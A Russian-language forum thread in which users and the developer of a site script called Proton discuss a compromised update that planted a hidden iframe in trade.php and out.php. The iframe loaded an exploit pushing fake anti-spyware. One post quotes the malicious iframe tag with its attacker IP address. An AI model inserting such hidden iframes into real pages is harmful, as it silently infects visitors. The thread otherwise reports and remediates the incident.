Новая тема   Ответить

 Scrudge
Сегодня ткнул на апдейт протона и мне на все страницы сиджа заебенили експлойт. Exploit.HTML.Mht
Грузиццо он отсюда 85.255.113.10

http://www.proton-tm.com/forum/ - та же история.

Вот такая вот неприятная картина вырисовывается.

 Scrudge
Зашёл с тестовой тачки. Чёто грузанулось. Посмотрим чего продают.

 WinXXXP
Похоже поломали их.

 Lorix
Мля внатуре! меня тоже ломанули. оут пхп

<iframe SRC="http://85.255.113.18/inc/nan23.html" WIDTH=0 BORDER=0 HEIGHT=0></iframe>
Zend

trade.php тоже самое

Последний раз редактировалось: Lorix (17/09/05 в 14:13), всего редактировалось 1 раз

 Kosmos
Продают антиспайваре TOP ANTI SPYWARE + PPC. НЕ ДЕЛАЙТЕ АПДЕЙТ ПРОТОНА !

 Scrudge
Да, парни продумались Это ж скоко трафа нахаляву!!!

Короче грузят ППЦ и продают софт. 171 это я так понимаю ID этого адверта.
http://www.clicksearchclick.biz/index.php
http://topantispyware.com/overview.php?171

Предлагаю админам этот топик залочить наверху, до решения этой проблемы.

Последний раз редактировалось: Scrudge (17/09/05 в 14:23), всего редактировалось 1 раз

 Lorix
какие они ещё файлы подменили?

 Scrudge


Одного out.php достаточно, что бы весь траф протоновский заражать.

 Gatos+
Это что получается?
Какие-то ребятишки поломали сайт,
изменили линк в сурсах, зазендили,
и ещё положили куда надо?

Что то мне не верится :-)

 LOVE
Замените файлы на старые. Вчерашний апдейт:
http://www.viva-host.com/proton.html

Желаю удачи.

 Kildoozer
Это просто пиздец. Я обязательно докопаюсь до истины и найду того, кто это сделал.
Ситуация такая - кто-то изменил 2 файла на нашем сервере, trade.php и out.php и сделал 'апдейт'. Кто успел его поставить - поставили вместо оригинальных фалов файлы с вирусом (что он делает - я еще не разобрался).
Сейчас (15.49 МСК) на сервере уже лежат ОРИГИНАЛЬНЫЕ, правильные файлы, можете смело обновляться.

Ифрейм ставился от парнерки toolbarparter (как минимум). Прошу владельца партнерки появиться здесь, и рассказать всем как лечится от бяки.

Приношу всем пользователям Протона извинения за случившееся (
Буду информировать о развитии событий в этом топике.

 SkyLine
LOVE писал:
Love красавчик, спасибо большое

 leetd
Kildoozer писал:

пиши/стучи владельцам партнёрки пусть баннят акк

 fazer
Я сегодня хотел проинсталить протон... так и не вышло...писало мол проблемы с Zend.... после этого ... в командере появился какой то левый доступ к фтп... flatbox.nl ... вот такой вот....

Сейчас сижу хаотично меняю везде пароли...

Что то уже известно что эти чупакабры могли запоганить?

 Vipman
Утром задумался что за нах если апдейт недавно был + делаю его постоянно показывает что ошибка с переменными типо 777 не стоит =(

Я часа 2 менял переменные, потом подключил хостера с ним меняли часа 2 - не получилось в конце концов не получилось решил проверить скрипт - БАБАХ ! ну думаю ДОПОМЕНЯЛИСЬ !

Захожу на форум - читаю ... БАБАХ номер Два !

Быстро вытащил с вчерашнего бэк апа 2 файлы trade.php и out.php

всё пока вроде работает !

 raider
Спасибо за out.php
А то сразу trade упал.

 Scrudge
А у меня как оказалось и admin.php слетел.

 Scrudge
fazer писал:

Пользуй касперского. Он эту шляпу сразу поймал и удалил нах.

 re
Mua-ha-ha-ha!
тревожный апдейт.
пацаны постарались поднасрать - беспредел. Хоть бы фильтры на русских ставили.
Мораль - опасность! Инсталим Аврору )

С уважением, нах.

 leetd
roxx писал: пользуйтесь аутпостом(отключаем активх, vb, скрытые фрэймы) и вам будет счастье :)

 Scrudge
leetdesign писал:

Не, аутпост - это параноя) Он сЦуко вообще всё обрубает нах. Может его и можно как-то настроить гибко, но я неосилил.

 annaxxl
вот как оно бывает

 GNail
Встречный вопрос. Как можно заметить скрипт out.php на точно такой же но с ифреймом. Да еще и закодированный Зендом ?

 Kildoozer
Файл был заменен на файл с ифреймом и одним словом 'Zend'. Размер этого файла 90 байт, у меня осталась копия.

Уязвимость на сервере бела наедена и устранена, все оказалось гораздо проще чем мы думали

Человек, который это сделал найден, через одну небезызвестную партнерку. Владелец партнерки отказался сообщать номер его аси. Самое интересное, что владелец партнерки прекрасно знает, что человек этот специализируется на хаке сайтов, но отказываться работать с ним не собирается, и более того, он мне сказал '****** не трогает сайты принадлежащие русским авм'ам. наверное не знал. скажу ему.' Замечательно просто, какой благородный человек, русских он не трогает!
Как только все выяснится и подтвердится на 100% - сообщу кто он такой, пусть ВСЕ спонсоры забанят его у себя. Зла на него не хватает.

Последний раз редактировалось: Kildoozer (18/09/05 в 12:46), всего редактировалось 1 раз

 Kildoozer
дабл пост.